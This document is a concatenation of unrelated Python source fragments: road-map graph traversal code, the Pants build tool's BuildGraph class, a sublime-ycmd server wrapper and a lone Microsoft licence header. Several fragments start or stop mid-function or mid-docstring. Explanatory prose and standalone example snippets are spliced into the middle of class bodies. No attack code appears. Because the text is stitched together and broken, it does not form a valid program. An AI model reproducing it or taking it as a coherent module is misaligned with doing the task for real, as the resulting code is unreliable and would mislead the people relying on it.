self.nodeLinkReverse[localid2].append(localid1)
def addEdgeToOneExistedNode(self, nid1,lat1,lon1,nid2, reverse=False, nodeScore1 = 0, edgeScore = 0): #n1d1->n1d2
if nid1 not in self.nodeHash.keys():
self.nodeHash[nid1] = self.nodeID
self.nodeHashReverse[self.nodeID] = nid1
self.nodes[self.nodeID] = [lat1, lon1]
self.nodeLink[self.nodeID] = []
self.nodeLinkReverse[self.nodeID] = []
self.nodeScore[self.nodeID] = nodeScore1
self.nodeID += 1
localid1 = self.nodeHash[nid1]
localid2 = nid2
self.edges[self.edgeID] = [localid1, localid2]
self.edgeHash[localid1 * 10000000 + localid2] = self.edgeID
self.edgeScore[self.edgeID] = edgeScore
self.edgeID += 1
if localid2 not in self.nodeLink[localid1]:
self.nodeLink[localid1].append(localid2)
if localid1 not in self.nodeLinkReverse[localid2]:
self.nodeLinkReverse[localid2].append(localid1)
def BiDirection(self):
edgeList = list(self.edges.values())
for edge in edgeList:
localid1 = edge[1]
localid2 = edge[0]
self.edges[self.edgeID] = [localid1, localid2]
self.edgeHash[localid1 * 10000000 + localid2] = self.edgeID
self.edgeScore[self.edgeID] = self.edgeScore[self.edgeHash[localid2 * 10000000 + localid1]]
self.edgeID += 1
if localid2 not in self.nodeLink[localid1]:
self.nodeLink[localid1].append(localid2)
def ReverseDirectionLink(self):
edgeList = list(self.edges.values())
self.nodeLinkReverse = {}
for edge in edgeList:
localid1 = edge[1]
localid2 = edge[0]
if localid1 not in self.nodeLinkReverse :
self.nodeLinkReverse[localid1] = [localid2]
else:
if localid2 not in self.nodeLinkReverse[localid1]:
self.nodeLinkReverse[localid1].append(localid2)
for nodeId in self.nodes.keys():
if nodeId not in self.nodeLinkReverse.keys():
self.nodeLinkReverse[nodeId] = []
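The reverse-adjacency construction in `ReverseDirectionLink` above can be sketched independently of the class: given directed edges stored as `(source, target)` pairs, build a map from each node to the nodes that point at it, with every node present as a key. A minimal sketch under those assumptions:

```python
# Sketch of the reverse-adjacency construction above: for each directed
# edge (u, v), record u as a predecessor of v; nodes with no incoming
# edges get an empty list.
def reverse_links(edges, nodes):
    rev = {n: [] for n in nodes}
    for u, v in edges:
        if u not in rev[v]:
            rev[v].append(u)
    return rev
```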
# DFS
def TOPOWalkDFS(self, nodeid, step = 0.00005, r = 0.00300, direction = False):
localNodeList = {}
localNodeDistance = {}
mables = []
localEdges = {}
#localNodeList[nodeid] = 1
#localNodeDistance[nodeid] = 0
def explore(node_cur, node_prev, dist):
old_node_dist = 1
if node_cur in localNodeList.keys():
old_node_dist = localNodeDistance[node_cur]
if localNodeDistance[node_cur] <= dist:
return
if dist > r :
return
lat1 = self.nodes[node_cur][0]
lon1 = self.nodes[node_cur][1]
localNodeList[node_cur] = 1
localNodeDistance[node_cur] = dist
#mables.append((lat1, lon1))
if node_cur not in self.nodeLinkReverse.keys():
self.nodeLinkReverse[node_cur] = []
reverseList = []
if direction == False:
reverseList = self.nodeLinkReverse[node_cur]
for next_node in self.nodeLink[node_cur] + reverseList:
edgeS = 0
if node_cur * 10000000 + next_node in self.edgeHash.keys():
edgeS = self.edgeScore[self.edgeHash[node_cur * 10000000 + next_node]]
if next_node * 10000000 + node_cur in self.edgeHash.keys():
edgeS = max(edgeS, self.edgeScore[self.edgeHash[next_node * 10000000 + node_cur]])
if self.nodeScore[next_node] > 0 and edgeS > 0:
pass
else:
continue
if next_node == node_prev :
continue
lat0 = 0
lon0 = 0
lat1 = self.nodes[node_cur][0]
lon1 = self.nodes[node_cur][1]
lat2 = self.nodes[next_node][0]
lon2 = self.nodes[next_node][1]
#TODO check angle of next_node
localEdgeId = node_cur * 10000000 + next_node
# if localEdgeId not in localEdges.keys():
# localEdges[localEdgeId] = 1
l = distance((lat2,lon2), (lat1,lon1))
num = int(math.ceil(l / step))
bias = step * math.ceil(dist / step) - dist
cur = bias
if old_node_dist + l < r :
explore(next_node, node_cur, dist + l)
else:
while cur < l:
alpha = cur / l
#for a in range(1,num):
# alpha = float(a)/num
if dist + l * alpha > r :
break
latI = lat2 * alpha + lat1 * (1-alpha)
lonI = lon2 * alpha + lon1 * (1-alpha)
if (latI, lonI) not in mables:
mables.append((latI, lonI))
cur += step
l = distance((lat2,lon2), (lat1,lon1))
explore(next_node, node_cur, dist + l)
explore(nodeid, -1, 0)
return mables
def distanceBetweenTwoLocation(self, loc1, loc2, max_distance):
localNodeList = {}
localNodeDistance = {}
#mables = []
localEdges = {}
edge_covered = {} # (s,e) --> distance from s and distance from e
if loc1[0] == loc2[0] and loc1[1] == loc2[1] :
return abs(loc1[2] - loc2[2])
elif loc1[0] == loc2[1] and loc1[1] == loc2[0]:
return abs(loc1[2] - loc2[3])
ans_dist = 100000
Queue = [(loc1[0], -1, loc1[2]), (loc1[1], -1, loc1[2])]
while True:
if len(Queue) == 0:
break
args = Queue.pop(0)
node_cur, node_prev, dist = args[0], args[1], args[2]
old_node_dist = 1
if node_cur in localNodeList.keys():
old_node_dist = localNodeDistance[node_cur]
if localNodeDistance[node_cur] <= dist:
continue
if dist > max_distance :
continue
lat1 = self.nodes[node_cur][0]
lon1 = self.nodes[node_cur][1]
localNodeList[node_cur] = 1
localNodeDistance[node_cur] = dist
#mables.append((lat1, lon1))
if node_cur not in self.nodeLinkReverse.keys():
self.nodeLinkReverse[node_cur] = []
reverseList = []
reverseList = self.nodeLinkReverse[node_cur]
visited_next_node = []
for next_node in self.nodeLink[node_cur] + reverseList:
if next_node == node_prev:
continue
if next_node == node_cur :
continue
if next_node == loc1[0] or next_node == loc1[1] :
continue
if next_node in visited_next_node:
continue
visited_next_node.append(next_node)
edgeS = 0
lat0 = 0
lon0 = 0
lat1 = self.nodes[node_cur][0]
lon1 = self.nodes[node_cur][1]
lat2 = self.nodes[next_node][0]
lon2 = self.nodes[next_node][1]
localEdgeId = node_cur * 10000000 + next_node
# if localEdgeId not in localEdges.keys():
# localEdges[localEdgeId] = 1
if node_cur == loc2[0] and next_node == loc2[1]:
new_ans = dist + loc2[2]
if new_ans < ans_dist :
ans_dist = new_ans
elif node_cur == loc2[1] and next_node == loc2[0]:
new_ans = dist + loc2[3]
if new_ans < ans_dist :
ans_dist = new_ans
l = distance((lat2,lon2), (lat1,lon1))
Queue.append((next_node, node_cur, dist + l))
return ans_dist
# BFS (much faster)
def TOPOWalk(self, nodeid, step = 0.00005, r = 0.00300, direction = False, newstyle = False, nid1=0, nid2=0, dist1=0, dist2= 0, bidirection = False, CheckGPS = None, metaData = None):
localNodeList = {}
localNodeDistance = {}
mables = []
localEdges = {}
edge_covered = {} # (s,e) --> distance from s and distance from e
#localNodeList[nodeid] = 1
#localNodeDistance[nodeid] = 0
if newstyle == False:
Queue = [(nodeid, -1, 0)]
else:
Queue = [(nid1, -1, dist1), (nid2, -1, dist2)]
# Add holes between nid1 and nid2
lat1 = self.nodes[nid1][0]
lon1 = self.nodes[nid1][1]
lat2 = self.nodes[nid2][0]
lon2 = self.nodes[nid2][1]
l = distance((lat2,lon2), (lat1,lon1))
num = int(math.ceil(l / step))
alpha = 0
while True:
latI = lat1*alpha + lat2*(1-alpha)
lonI = lon1*alpha + lon2*(1-alpha)
d1 = distance((latI,lonI),(lat1,lon1))
d2 = distance((latI,lonI),(lat2,lon2))
if dist1 - d1 < r or dist2 - d2 < r:
if (latI, lonI, lat2 - lat1, lon2 - lon1) not in mables:
mables.append((latI, lonI, lat2 - lat1, lon2 - lon1)) # | |
# coding=utf-8
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import logging
import traceback
from collections import OrderedDict, defaultdict, deque
from twitter.common.collections import OrderedSet
from pants.build_graph.address import Address
from pants.build_graph.address_lookup_error import AddressLookupError
logger = logging.getLogger(__name__)
class BuildGraph(object):
"""A directed acyclic graph of Targets and dependencies. Not necessarily connected."""
class DuplicateAddressError(AddressLookupError):
"""The same address appears multiple times in a dependency list"""
class TransitiveLookupError(AddressLookupError):
"""Used to append the current node to the error message from an AddressLookupError """
@staticmethod
def closure(targets, bfs=False):
targets = OrderedSet(targets)
if not targets:
return OrderedSet()
build_graph = next(iter(targets))._build_graph
if bfs:
transitive_subgraph_fn = build_graph.transitive_subgraph_of_addresses_bfs
else:
transitive_subgraph_fn = build_graph.transitive_subgraph_of_addresses
return transitive_subgraph_fn(t.address for t in targets)
def __init__(self, address_mapper):
self._address_mapper = address_mapper
self.reset()
@property
def address_mapper(self):
return self._address_mapper
def reset(self):
"""Clear out the state of the BuildGraph, in particular Target mappings and dependencies."""
self._addresses_already_closed = set()
self._target_by_address = OrderedDict()
self._target_dependencies_by_address = defaultdict(OrderedSet)
self._target_dependees_by_address = defaultdict(set)
self._derived_from_by_derivative_address = {}
def contains_address(self, address):
return address in self._target_by_address
def get_target_from_spec(self, spec, relative_to=''):
"""Converts `spec` into an address and returns the result of `get_target`"""
return self.get_target(Address.parse(spec, relative_to=relative_to))
def get_target(self, address):
"""Returns the Target at `address` if it has been injected into the BuildGraph, otherwise None.
"""
return self._target_by_address.get(address, None)
def dependencies_of(self, address):
"""Returns the dependencies of the Target at `address`.
This method asserts that the address given is actually in the BuildGraph.
"""
assert address in self._target_by_address, (
'Cannot retrieve dependencies of {address} because it is not in the BuildGraph.'
.format(address=address)
)
return self._target_dependencies_by_address[address]
def dependents_of(self, address):
"""Returns the Targets which depend on the target at `address`.
This method asserts that the address given is actually in the BuildGraph.
"""
assert address in self._target_by_address, (
'Cannot retrieve dependents of {address} because it is not in the BuildGraph.'
.format(address=address)
)
return self._target_dependees_by_address[address]
def get_derived_from(self, address):
"""Get the target the specified target was derived from.
If a Target was injected programmatically, e.g. from codegen, this allows us to trace its
ancestry. If a Target is not derived, default to returning itself.
"""
parent_address = self._derived_from_by_derivative_address.get(address, address)
return self.get_target(parent_address)
def get_concrete_derived_from(self, address):
"""Get the concrete target the specified target was (directly or indirectly) derived from.
The returned target is guaranteed to not have been derived from any other target.
"""
current_address = address
next_address = self._derived_from_by_derivative_address.get(current_address, current_address)
while next_address != current_address:
current_address = next_address
next_address = self._derived_from_by_derivative_address.get(current_address, current_address)
return self.get_target(current_address)
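The chain walk in `get_concrete_derived_from` above reduces to a fixed-point loop over a mapping: follow `derived_from` links until reaching an address that maps to itself (or is absent from the map). A minimal standalone sketch of that loop, using a plain dict in place of the graph's internal state:

```python
# Sketch of the derived-from chain walk above: follow the mapping until
# it stops changing, i.e. until we reach a target that was not derived
# from any other target.
def concrete_root(derived_from_by_address, address):
    current = address
    nxt = derived_from_by_address.get(current, current)
    while nxt != current:
        current = nxt
        nxt = derived_from_by_address.get(current, current)
    return current
```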
def inject_target(self, target, dependencies=None, derived_from=None):
"""Injects a fully realized Target into the BuildGraph.
:param Target target: The Target to inject.
:param list<Address> dependencies: The Target addresses that `target` depends on.
:param Target derived_from: The Target that `target` was derived from, usually as a result
of codegen.
"""
dependencies = dependencies or frozenset()
address = target.address
if address in self._target_by_address:
raise ValueError('A Target {existing_target} already exists in the BuildGraph at address'
' {address}. Failed to insert {target}.'
.format(existing_target=self._target_by_address[address],
address=address,
target=target))
if derived_from:
if not self.contains_address(derived_from.address):
raise ValueError('Attempted to inject synthetic {target} derived from {derived_from}'
' into the BuildGraph, but {derived_from} was not in the BuildGraph.'
' Synthetic Targets must be derived from no Target (None) or from a'
' Target already in the BuildGraph.'
.format(target=target,
derived_from=derived_from))
self._derived_from_by_derivative_address[target.address] = derived_from.address
self._target_by_address[address] = target
for dependency_address in dependencies:
self.inject_dependency(dependent=address, dependency=dependency_address)
def inject_dependency(self, dependent, dependency):
"""Injects a dependency from `dependent` onto `dependency`.
It is an error to inject a dependency if the dependent doesn't already exist, but the reverse
is not an error.
:param Address dependent: The (already injected) address of a Target to which `dependency`
is being added.
:param Address dependency: The dependency to be injected.
"""
if dependent not in self._target_by_address:
raise ValueError('Cannot inject dependency from {dependent} on {dependency} because the'
' dependent is not in the BuildGraph.'
.format(dependent=dependent, dependency=dependency))
# TODO(pl): Unfortunately this is an unhelpful time to error due to a cycle. Instead, we warn
# and allow the cycle to appear. It is the caller's responsibility to call sort_targets on the
# entire graph to generate a friendlier CycleException that actually prints the cycle.
# Alternatively, we could call sort_targets after every inject_dependency/inject_target, but
# that could have nasty performance implications. Alternative 2 would be to have an internal
# data structure of the topologically sorted graph which would have acceptable amortized
# performance for inserting new nodes, and also cycle detection on each insert.
if dependency not in self._target_by_address:
logger.warning('Injecting dependency from {dependent} on {dependency}, but the dependency'
' is not in the BuildGraph. This probably indicates a dependency cycle, but'
' it is not an error until sort_targets is called on a subgraph containing'
' the cycle.'
.format(dependent=dependent, dependency=dependency))
if dependency in self.dependencies_of(dependent):
logger.debug('{dependent} already depends on {dependency}'
.format(dependent=dependent, dependency=dependency))
else:
self._target_dependencies_by_address[dependent].add(dependency)
self._target_dependees_by_address[dependency].add(dependent)
def targets(self, predicate=None):
"""Returns all the targets in the graph in no particular order.
:param predicate: A target predicate that will be used to filter the targets returned.
"""
return filter(predicate, self._target_by_address.values())
def sorted_targets(self):
""":return: targets ordered from most dependent to least."""
return sort_targets(self._target_by_address.values())
def walk_transitive_dependency_graph(self, addresses, work, predicate=None, postorder=False):
"""Given a work function, walks the transitive dependency closure of `addresses` using DFS.
:param list<Address> addresses: The closure of `addresses` will be walked.
:param function work: The function that will be called on every target in the closure using
the specified traversal order.
:param bool postorder: When ``True``, the traversal order is postorder (children before
parents), else it is preorder (parents before children).
:param function predicate: If this parameter is not given, no Targets will be filtered
out of the closure. If it is given, any Target which fails the predicate will not be
walked, nor will its dependencies. Thus predicate effectively trims out any subgraph
that would only be reachable through Targets that fail the predicate.
"""
walked = set()
def _walk_rec(addr):
if addr not in walked:
walked.add(addr)
target = self._target_by_address[addr]
if not predicate or predicate(target):
if not postorder:
work(target)
for dep_address in self._target_dependencies_by_address[addr]:
_walk_rec(dep_address)
if postorder:
work(target)
for address in addresses:
_walk_rec(address)
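The preorder/postorder contract described in the docstring above can be sketched standalone with a plain adjacency dict (toy data, not the real BuildGraph API):

```python
def walk(graph, roots, work, postorder=False):
    # DFS over an address -> [dependency addresses] adjacency dict;
    # each node is visited exactly once, as in walk_transitive_dependency_graph.
    walked = set()

    def _walk_rec(addr):
        if addr in walked:
            return
        walked.add(addr)
        if not postorder:
            work(addr)          # preorder: parents before children
        for dep in graph.get(addr, ()):
            _walk_rec(dep)
        if postorder:
            work(addr)          # postorder: children before parents

    for root in roots:
        _walk_rec(root)

graph = {'a': ['b', 'c'], 'b': ['c'], 'c': []}
pre, post = [], []
walk(graph, ['a'], pre.append)
walk(graph, ['a'], post.append, postorder=True)
# pre  -> ['a', 'b', 'c']
# post -> ['c', 'b', 'a']
```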
def walk_transitive_dependee_graph(self, addresses, work, predicate=None, postorder=False):
"""Identical to `walk_transitive_dependency_graph`, but walks dependees preorder (or postorder
if the postorder parameter is True).
This is identical to reversing the direction of every arrow in the DAG, then calling
`walk_transitive_dependency_graph`.
"""
walked = set()
def _walk_rec(addr):
if addr not in walked:
walked.add(addr)
target = self._target_by_address[addr]
if not predicate or predicate(target):
if not postorder:
work(target)
for dep_address in self._target_dependees_by_address[addr]:
_walk_rec(dep_address)
if postorder:
work(target)
for address in addresses:
_walk_rec(address)
def transitive_dependees_of_addresses(self, addresses, predicate=None, postorder=False):
"""Returns all transitive dependees of `address`.
Note that this uses `walk_transitive_dependee_graph` and the predicate is passed through,
hence it trims graphs rather than just filtering out Targets that do not match the predicate.
See `walk_transitive_dependee_graph` for more detail on `predicate`.
:param list<Address> addresses: The root addresses to transitively close over.
:param function predicate: The predicate passed through to `walk_transitive_dependee_graph`.
"""
ret = OrderedSet()
self.walk_transitive_dependee_graph(addresses, ret.add, predicate=predicate,
postorder=postorder)
return ret
def transitive_subgraph_of_addresses(self, addresses, predicate=None, postorder=False):
"""Returns all transitive dependencies of `address`.
Note that this uses `walk_transitive_dependency_graph` and the predicate is passed through,
hence it trims graphs rather than just filtering out Targets that do not match the predicate.
See `walk_transitive_dependency_graph` for more detail on `predicate`.
:param list<Address> addresses: The root addresses to transitively close over.
:param function predicate: The predicate passed through to
`walk_transitive_dependency_graph`.
"""
ret = OrderedSet()
self.walk_transitive_dependency_graph(addresses, ret.add,
predicate=predicate,
postorder=postorder)
return ret
def transitive_subgraph_of_addresses_bfs(self, addresses, predicate=None):
"""Returns the transitive dependency closure of `addresses` using BFS.
:param list<Address> addresses: The closure of `addresses` will be walked.
:param function predicate: If this parameter is not given, no Targets will be filtered
out of the closure. If it is given, any Target which fails the predicate will not be
walked, nor will its dependencies. Thus predicate effectively trims out any subgraph
that would only be reachable through Targets that fail the predicate.
"""
walked = OrderedSet()
to_walk = deque(addresses)
while len(to_walk) > 0:
address = to_walk.popleft()
target = self._target_by_address[address]
if target not in walked and (not predicate or predicate(target)):
walked.add(target)
to_walk.extend(self._target_dependencies_by_address[address])
return walked
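The BFS closure described in the docstring above can be sketched standalone; predicate trimming skips a node and everything reachable only through it (toy adjacency dict, not the real graph structures):

```python
from collections import deque

def bfs_closure(graph, roots, predicate=None):
    # breadth-first transitive closure over an address -> [deps] adjacency dict
    walked, order = set(), []
    to_walk = deque(roots)
    while to_walk:
        addr = to_walk.popleft()
        if addr in walked:
            continue
        walked.add(addr)
        if predicate and not predicate(addr):
            continue            # trim: do not enqueue this node's dependencies
        order.append(addr)
        to_walk.extend(graph.get(addr, ()))
    return order

graph = {'a': ['b', 'c'], 'b': ['d'], 'c': [], 'd': []}
full = bfs_closure(graph, ['a'])
# 'd' is only reachable through 'b', so trimming 'b' also drops 'd'
trimmed = bfs_closure(graph, ['a'], predicate=lambda n: n != 'b')
```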
#!/usr/bin/env python3
'''
lib/ycmd/server.py
Server abstraction layer.
Defines a server class that represents a connection to a ycmd server process.
Information about the actual server process is available via the properties.
The ycmd server handlers are exposed as methods on this class. To send a
request to the server process, call the method, and it will package up the
parameters and send the request. These calls will block, and return the result
of the request (or raise an exception for unexpected errors).
NOTE : This uses `http` instead of `urllib`, as `urllib` raises exceptions when
the server responds with an error status code. This prevents fetching
the response body to parse/retrieve the error message.
'''
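The NOTE above matches Python 3 behavior: `urllib.request.urlopen` raises `HTTPError` for non-2xx statuses, while `http.client` hands back the response object regardless of status, so the error body stays trivially readable. A minimal sketch against a throwaway local server (illustrative only, not the ycmd protocol):

```python
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

class ErrorHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # always fail with a JSON error body, like a server-side exception would
        body = b'{"exception": "something went wrong"}'
        self.send_response(500)
        self.send_header('Content-Length', str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):
        pass  # keep test output quiet

server = HTTPServer(('127.0.0.1', 0), ErrorHandler)
threading.Thread(target=server.serve_forever, daemon=True).start()

conn = http.client.HTTPConnection('127.0.0.1', server.server_port)
conn.request('GET', '/healthy')
response = conn.getresponse()       # no exception raised for the 500 status
status, body = response.status, response.read()
conn.close()
server.shutdown()
```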
import http
import logging
import os
import threading
from ..process import Process
from ..schema.completions import parse_completions
from ..schema.request import RequestParameters
from ..util.format import (
json_serialize,
json_parse,
)
from ..util.fs import (
is_file,
get_base_name,
)
from ..util.hmac import (
calculate_hmac,
new_hmac_secret,
)
from ..util.lock import lock_guard
from ..util.str import (
str_to_bytes,
truncate,
)
from ..util.sys import get_unused_port
from ..ycmd.constants import (
YCMD_EVENT_BUFFER_UNLOAD,
YCMD_EVENT_BUFFER_VISIT,
YCMD_EVENT_CURRENT_IDENTIFIER_FINISHED,
YCMD_EVENT_FILE_READY_TO_PARSE,
YCMD_EVENT_INSERT_LEAVE,
YCMD_HANDLER_DEBUG_INFO,
YCMD_HANDLER_DEFINED_SUBCOMMANDS,
YCMD_HANDLER_EVENT_NOTIFICATION,
YCMD_HANDLER_GET_COMPLETIONS,
YCMD_HANDLER_HEALTHY,
YCMD_HANDLER_IGNORE_EXTRA_CONF,
YCMD_HANDLER_LOAD_EXTRA_CONF,
YCMD_HANDLER_SHUTDOWN,
YCMD_HMAC_HEADER,
YCMD_HMAC_SECRET_LENGTH,
)
from ..ycmd.start import (
StartupParameters,
to_startup_parameters,
write_ycmd_settings_file,
prepare_ycmd_process,
)
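The HMAC helpers imported above are not shown in this file; a minimal sketch of what such helpers typically do — generate a random secret and sign a payload with HMAC-SHA256 (the exact ycmd signing scheme may differ, so treat the details as assumptions):

```python
import base64
import hashlib
import hmac
import os

def new_hmac_secret(num_bytes=16):
    # cryptographically random secret shared with the server via its settings file
    return os.urandom(num_bytes)

def calculate_hmac(secret, data):
    # base64-encoded HMAC-SHA256 digest, suitable as an HTTP header value
    digest = hmac.new(secret, data, hashlib.sha256).digest()
    return base64.b64encode(digest)

secret = new_hmac_secret()
signature = calculate_hmac(secret, b'{"filepath": "test.py"}')
# verify with a constant-time comparison, as a server would
ok = hmac.compare_digest(signature, calculate_hmac(secret, b'{"filepath": "test.py"}'))
```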
logger = logging.getLogger('sublime-ycmd.' + __name__)
# special logger instance for use in the server class
# this logger uses a filter to add server information to all log statements
_server_logger = logging.getLogger('sublime-ycmd.' + __name__ + '.server')
# time limit for queued requests, in seconds
# it's a good idea to have one, so requests can't be queued indefinitely
QUEUED_REQUEST_MAX_WAIT_TIME = 1
class Server(object):
'''
Self-contained ycmd server object. Creates and maintains a persistent
connection to a ycmd server process. Provides a simple-ish way to send
API requests to the backend, including control functions like stopping and
pinging the server.
'''
NULL = 'Server.NULL'
STARTING = 'Server.STARTING'
RUNNING = 'Server.RUNNING'
STOPPING = 'Server.STOPPING'
def __init__(self):
self._lock = threading.RLock()
self._status = Server.NULL
self._status_cv = threading.Condition(self._lock)
self._process_handle = None
# handles to the spooled log files:
self._stdout_log_handle = None
self._stderr_log_handle = None
# copy of the startup parameters and temporary file path:
self._startup_parameters = None
self._settings_tempfile_path = None
self._hostname = None
self._port = None
self._hmac = None
self._label = None
self.reset()
def reset(self):
self._status = Server.NULL
self._process_handle = None
self._stdout_log_handle = None
self._stderr_log_handle = None
self._startup_parameters = None
self._settings_tempfile_path = None
self._hostname = None
self._port = None
self._hmac = None
self._label = None
self._reset_logger()
def start(self, ycmd_root_directory,
ycmd_settings_path=None, working_directory=None,
python_binary_path=None, server_idle_suicide_seconds=None,
server_check_interval_seconds=None):
'''
Launches a ycmd server process with the given startup parameters. The
only required startup parameter is `ycmd_root_directory`. If it is a
`str`, then all other omitted parameters will be calculated with
respect to it. If it is an instance of `StartupParameters`, then all
other parameters will be ignored, as that class contains all the
necessary information. It is preferable to use `StartupParameters`.
If `ycmd_settings_path` is not provided, it is calculated relative to
the `ycmd_root_directory` (the repository contains the template in
`default_settings.json`).
If `working_directory` is not provided, the current working directory
is used, as calculated by the `os` module.
If `python_binary_path` is not provided, the system-installed python is
used. This implicitly depends on the `PATH` environment variable.
If `server_idle_suicide_seconds` is not provided, a default is used.
If `server_check_interval_seconds` is not provided, a default is used.
It is preferable to use the concrete `StartupParameters` class, since
this ends up constructing one anyway if it isn't already in that form.
'''
startup_parameters = to_startup_parameters(
ycmd_root_directory,
ycmd_settings_path=ycmd_settings_path,
working_directory=working_directory,
python_binary_path=python_binary_path,
server_idle_suicide_seconds=server_idle_suicide_seconds,
server_check_interval_seconds=server_check_interval_seconds,
)
assert isinstance(startup_parameters, StartupParameters), \
'[internal] startup parameters is not StartupParameters: %r' % \
(startup_parameters)
# don't use instance logger, since it may not be initialized
logger.debug(
'preparing to start ycmd server with startup parameters: %s',
startup_parameters,
)
self.set_status(Server.STARTING)
# update parameters to reflect normalized settings:
ycmd_root_directory = startup_parameters.ycmd_root_directory
ycmd_settings_path = startup_parameters.ycmd_settings_path
working_directory = startup_parameters.working_directory
python_binary_path = startup_parameters.python_binary_path
server_idle_suicide_seconds = \
startup_parameters.server_idle_suicide_seconds
server_check_interval_seconds = \
startup_parameters.server_check_interval_seconds
ycmd_server_hostname = '127.0.0.1'
ycmd_server_port = get_unused_port(ycmd_server_hostname)
ycmd_server_label = get_base_name(working_directory)
# initialize connection parameters asap to set up the instance logger:
with self._lock:
self.hostname = ycmd_server_hostname
self.port = ycmd_server_port
try:
ycmd_hmac_secret = new_hmac_secret(
num_bytes=YCMD_HMAC_SECRET_LENGTH,
)
ycmd_settings_tempfile_path = write_ycmd_settings_file(
ycmd_settings_path, ycmd_hmac_secret,
)
if ycmd_settings_tempfile_path is None:
self._logger.error(
'failed to generate ycmd server settings file, '
'cannot start server'
)
raise RuntimeError(
'failed to generate ycmd server settings file'
)
# NOTE : This does not start the process.
ycmd_process_handle = prepare_ycmd_process(
startup_parameters, ycmd_settings_tempfile_path,
ycmd_server_hostname, ycmd_server_port,
)
except Exception as e:
self._logger.error(
'failed to prepare ycmd server process: %r', e, exc_info=True,
)
self.set_status(Server.NULL)
return
self._logger.debug(
'successfully prepared server process, about to start it'
)
with self._lock:
self._process_handle = ycmd_process_handle
self._stdout_log_handle = ycmd_process_handle.filehandles.stdout
self._stderr_log_handle = ycmd_process_handle.filehandles.stderr
self._startup_parameters = startup_parameters
self._settings_tempfile_path = ycmd_settings_tempfile_path
self.hostname = ycmd_server_hostname
self.port = ycmd_server_port
self.hmac = ycmd_hmac_secret
self.label = ycmd_server_label
def _check_and_remove_settings_tmp():
try:
if is_file(ycmd_settings_tempfile_path):
self._logger.debug(
'removing temporary settings file: %s',
ycmd_settings_tempfile_path,
)
os.remove(ycmd_settings_tempfile_path)
except Exception as e:
self._logger.warning(
'failed to remove temporary settings file: %r, error: %r',
ycmd_settings_tempfile_path, e,
)
try:
ycmd_process_handle.start()
except ValueError as e:
self._logger.error(
'failed to launch ycmd server, argument error: %s', e,
)
_check_and_remove_settings_tmp()
except OSError as e:
self._logger.warning(
'failed to launch ycmd server, system error: %s', e,
)
_check_and_remove_settings_tmp()
if ycmd_process_handle.alive():
self._logger.debug('process launched successfully!')
self.set_status(Server.RUNNING)
else:
# nothing much we can do here - caller can check the output
self._logger.debug(
'process is no longer alive, there was probably an error'
)
self.set_status(Server.NULL)
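The `get_unused_port` helper used in `start` is imported from a util module not shown here; the usual approach is to bind to port 0 and let the OS pick a free ephemeral port (a sketch, with the caveat that the port could be taken again before the server binds it):

```python
import socket

def get_unused_port(hostname='127.0.0.1'):
    # binding to port 0 makes the kernel assign a currently-free ephemeral port
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.bind((hostname, 0))
        return sock.getsockname()[1]

port = get_unused_port()
```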
def stop(self, hard=False, timeout=None):
with self._lock:
if not self.is_alive(timeout=0):
self._logger.debug('not alive, nothing to stop, returning')
return
if hard:
self._process_handle.kill()
elif not self.is_stopping():
self._send_request(
YCMD_HANDLER_SHUTDOWN, method='POST', timeout=timeout,
)
else:
self._logger.debug(
'already sent a shutdown request, not sending another one'
)
self.set_status(Server.STOPPING)
# release lock before waiting
process_handle = self._process_handle
process_handle.wait(timeout=timeout)
# if that didn't raise a `TimeoutError`, then the process is dead!
with self._lock:
self.set_status(Server.NULL)
@lock_guard()
def is_null(self):
if self._status != Server.NULL:
self._logger.debug('status is not null, assuming handle is valid')
return False
if self._process_handle is not None:
self._logger.warning(
'status is null, but process handle is not null, '
'clearing handle: %r', self._process_handle
)
self._process_handle = None
return True
@lock_guard()
def is_starting(self):
return self._status == Server.STARTING
@lock_guard()
def is_alive(self, timeout=None):
if self._status not in [Server.RUNNING, Server.STOPPING]:
self._logger.debug('status is not running, assuming not alive')
return False
self._logger.debug('checking process handle: %r', self._process_handle)
if not self._process_handle:
if self._status != Server.STOPPING:
self._logger.warning(
'status is running, but no process handle exists, '
'changing to null status'
)
self.set_status(Server.NULL)
return False
if not self._process_handle.alive():
self._logger.debug('process has died, changing to null status')
self._process_handle = None
self.set_status(Server.NULL)
return False
if self._status == Server.STOPPING:
# don't bother sending a health check request - it's shutting down
self._logger.debug(
'server is shutting down, so treating it as not alive, '
'returning false'
)
return False
if timeout == 0:
# treat this as a "quick" check, and optimistically return true
# (the caller should be aware of the implications)
self._logger.debug(
'timeout is 0, so not sending health-check request, '
'returning true'
)
return True
try:
response = self._send_request(
YCMD_HANDLER_HEALTHY, timeout=timeout,
)
except TimeoutError:
self._logger.debug(
'request timed out, server may be alive, but returning false'
)
# as noted, server may be alive, so don't change running status
return False
except Exception as e:
self._logger.warning('error during health check: %r', e)
response = None
if response is None:
self._logger.debug('health check failed, changing to null status')
self._process_handle = None
self.set_status(Server.NULL)
return False
return True
@lock_guard()
def is_stopping(self):
return self._status == Server.STOPPING
@lock_guard()
def communicate(self, inpt=None, timeout=None):
self._logger.warning('[DEPRECATED] communicate - use stdout/stderr')
if not self._process_handle:
self._logger.debug('no process handle, cannot communicate')
return None, None
assert isinstance(self._process_handle, Process), \
'[internal] process handle is not Process: %r' % \
(self._process_handle)
return self._process_handle.communicate(inpt=inpt, timeout=timeout)
def wait_for_status(self, status=None, timeout=None):
'''
Waits for the server status to change.
If `status` is omitted, any status change will cause this to return.
Otherwise, if `status` is a `Server` constant, then this will block
until that status is reached. If `status` is a `list` of constants,
then any status in that list will be awaited.
If `timeout` is omitted, this will block indefinitely.
Otherwise, `timeout` should be the number of seconds to wait for until
a `TimeoutError` is raised.
# contrib/profiler/profiler.py
# Copyright (c) Microsoft Corporation
# All rights reserved.
#
# MIT License
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
# documentation files (the "Software"), to deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above
# copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
#
